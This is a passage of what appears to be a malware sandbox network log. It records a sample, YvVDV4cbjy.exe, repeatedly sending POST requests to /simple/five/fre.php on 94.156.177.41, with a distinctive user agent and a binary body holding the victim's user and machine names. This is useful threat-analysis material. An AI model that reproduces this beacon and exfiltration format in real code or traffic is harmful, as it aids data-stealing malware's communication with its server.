                            Jan 11, 2025 07:45:48.926311970 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            90192.168.2.55007194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:49.098901033 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:49.103766918 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:49.823978901 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            91192.168.2.55007294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:49.995032072 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:49.999888897 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:50.734549999 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            92192.168.2.55007394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:50.892791986 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:50.897746086 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:51.619489908 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:51 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            93192.168.2.55007494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:51.762840986 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:51.767771959 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:52.455550909 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            94192.168.2.55007594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:52.605214119 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:52.610435009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:53.300391912 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            95192.168.2.55007694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:53.842950106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:53.849528074 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:54.575973988 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            96192.168.2.55007794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:54.728818893 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:54.733798981 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:55.483252048 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            97192.168.2.55007894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:55.633569956 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:55.638595104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:56.355166912 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:56 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            98192.168.2.55007994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:56.509545088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:56.514452934 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:57.212044001 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            99192.168.2.55008094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:57.359915018 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:57.364759922 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:58.216295958 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            100192.168.2.55008194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:58.377670050 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:58.382541895 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:59.120776892 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            101192.168.2.55008294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:59.294701099 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:59.299658060 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:59.986650944 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            102192.168.2.55008394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:00.140888929 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:00.145771027 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:00.838119984 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            103192.168.2.55008494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:00.976548910 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:00.982125998 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:01.716804028 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:01 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            104192.168.2.55008594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:01.867796898 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:01.873444080 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:02.578923941 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            105192.168.2.55008694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:02.868691921 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:02.873702049 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:03.569354057 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            106192.168.2.55008794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:03.717689037 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:03.722759962 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:04.428982973 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:04 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            107192.168.2.55008894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:04.598776102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:04.607701063 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:05.309093952 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            108192.168.2.55008994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:05.485071898 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:05.489995956 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:06.195997953 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:06 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            109192.168.2.55009094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:06.348757982 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:06.353602886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:46:07.103013039 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:46:06 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            110192.168.2.55009194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:46:07.250516891 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:46:07.255436897 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
